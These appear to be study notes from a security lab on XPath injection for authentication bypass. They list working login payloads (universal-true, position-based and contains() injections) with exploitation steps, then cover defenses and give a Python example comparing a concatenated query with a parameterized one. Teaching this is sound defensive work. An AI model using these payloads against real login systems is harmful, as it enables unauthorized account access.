XPath Injection - Authentication Bypass

Key Concepts

  1. What is XPath?

    • XPath is a query language for selecting nodes from an XML document.

    • It is often used in web applications for data retrieval and authentication mechanisms.

  2. What is XPath Injection?

    • An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.


XPath Query Example

Consider the following XML user data:

<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>

Authentication might use the following query:

/users/user[username/text()='USERNAME' and password/text()='PASSWORD']

If user input is unsanitized, injection becomes possible.


Common Payloads

  1. Universal True (Bypass Authentication):

    ' or '1'='1

    Resulting Query:

    /users/user[username/text()='' or '1'='1' and password/text()='']
  2. Target a Specific User (Admin):

    admin' or '1'='1

    Resulting Query:

    /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
  3. Use Position-Based Targeting:

    ' or position()=2 or '

    Change the 2 to a 3 to pivot to a different account:

    ' or position()=3 or '

    Resulting Query:

    /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
    • This targets the second user in the XML file (e.g., admin).

  4. Substring Matching:

    ' or contains(.,'admin') or '

    Resulting Query:

    /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
    • Searches for any user with "admin" in their username or other fields.


Steps to Exploit

  1. Analyze Application Behavior:

    • Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).

  2. Test for Injection Points:

    • Inject payloads into the username or password fields to observe server responses.

  3. Craft Payloads:

    • Use payloads like position() or contains() to refine your query targeting.

  4. Privilege Escalation:

    • Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.


Practical Exploitation Example

Payload to Target Admin (Second User):

username=' or position()=2 or '&password=irrelevant

Response Example:

  • Successfully logged in; the response shows WELCOME SUPERUSER!


Defense Measures

  1. Sanitize Inputs:

    • Use proper input validation and encoding to prevent injection.

    • Reject special characters like ', ", [, and ].

  2. Parameterized Queries:

    • Avoid dynamically building XPath queries. Use parameterized XPath APIs that bind the values as XPath variables, so user input is never interpolated into the query string:

      // $username and $password are XPath variable references bound by the XPath engine,
      // not string interpolation (hence the single quotes).
      $query = '/users/user[username/text()=$username and password/text()=$password]';
  3. Hash Passwords:

    • Ensure passwords are hashed before storage and comparison.

  4. Error Messages:

    • Avoid detailed error messages that reveal query structures.
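The vulnerable query builder from the XPath Query Example above, side by side with the parameterized form recommended under Defense Measures, as an added example that is not part of these notes. It assumes the lxml library; the XML store is a constructed copy of the one above, and the function names (login_vulnerable, login_safe, has_xpath_metachars) are my own.

```python
# Added example (not from the original notes): string-built XPath login next
# to a parameterized version. Assumes lxml; XML, names and inputs are
# constructed here.
from lxml import etree

# Constructed user store, mirroring the XML shown in the notes.
USERS_XML = b"""<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>"""

USERS = etree.fromstring(USERS_XML)


def login_vulnerable(username, password):
    """Builds the XPath by concatenation, the pattern the notes warn about.
    Returns the matched username or None."""
    query = (
        "/users/user[username/text()='" + username
        + "' and password/text()='" + password + "']"
    )
    try:
        matches = USERS.xpath(query)
    except etree.XPathError:
        # A lone quote or bracket in the input breaks the expression. An app
        # that echoes this error leaks the query shape (Defense Measure 4).
        return None
    # The first matching <user> wins, which is why a "universal true"
    # payload logs in as the first user in the file.
    return matches[0].findtext("username") if matches else None


def login_safe(username, password):
    """Same logic, but $u and $p are XPath variables bound by the engine, so
    the input is compared as data and cannot change the query structure."""
    query = "/users/user[username/text()=$u and password/text()=$p]"
    matches = USERS.xpath(query, u=username, p=password)
    return matches[0].findtext("username") if matches else None


def has_xpath_metachars(value):
    """Defense-in-depth check from the notes (Defense Measure 1): flag the
    characters that let input alter query structure. Good for logging and
    alerting; not a substitute for parameterization."""
    return any(c in value for c in "'\"[]")


if __name__ == "__main__":
    # 'and' binds tighter than 'or' in XPath, so the universal-true payload
    # is supplied in both fields to make the whole predicate true.
    universal = "' or '1'='1"
    print(login_vulnerable(universal, universal))      # htb-stdnt (first user)
    print(login_safe(universal, universal))            # None
    # Position-based payload from the notes targets the second <user>.
    positional = "' or position()=2 or '"
    print(login_vulnerable(positional, "irrelevant"))  # admin
    print(login_safe(positional, "irrelevant"))        # None
    print(login_safe("admin", "admin"))                # admin
```

Run it as a script to see the two builders diverge on the notes' payloads: the concatenated query is rewritten by the input, while the variable-bound query treats the same text as an ordinary (non-matching) username. The metachar check is worth wiring into request logging so attempts show up in detection even after the query itself is parameterized.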


Key Takeaways

  • XPath Injection is similar to SQL Injection but targets XML queries.

  • Functions like position() and contains() can help refine targeting in complex scenarios.

  • Proper sanitization and secure coding practices are essential to mitigate these attacks.


Payloads to Remember

  Scenario                            | Payload                        | Result
  ------------------------------------|--------------------------------|----------------------------------------
  Bypass Authentication               | ' or '1'='1                    | Logs in as the first user.
  Target Specific User (e.g., Admin)  | admin' or '1'='1               | Logs in as admin.
  Position-Based User Targeting       | ' or position()=2 or '         | Logs in as the second user.
  Substring Matching (Admin)          | ' or contains(.,'admin') or '  | Finds users with "admin" in username.
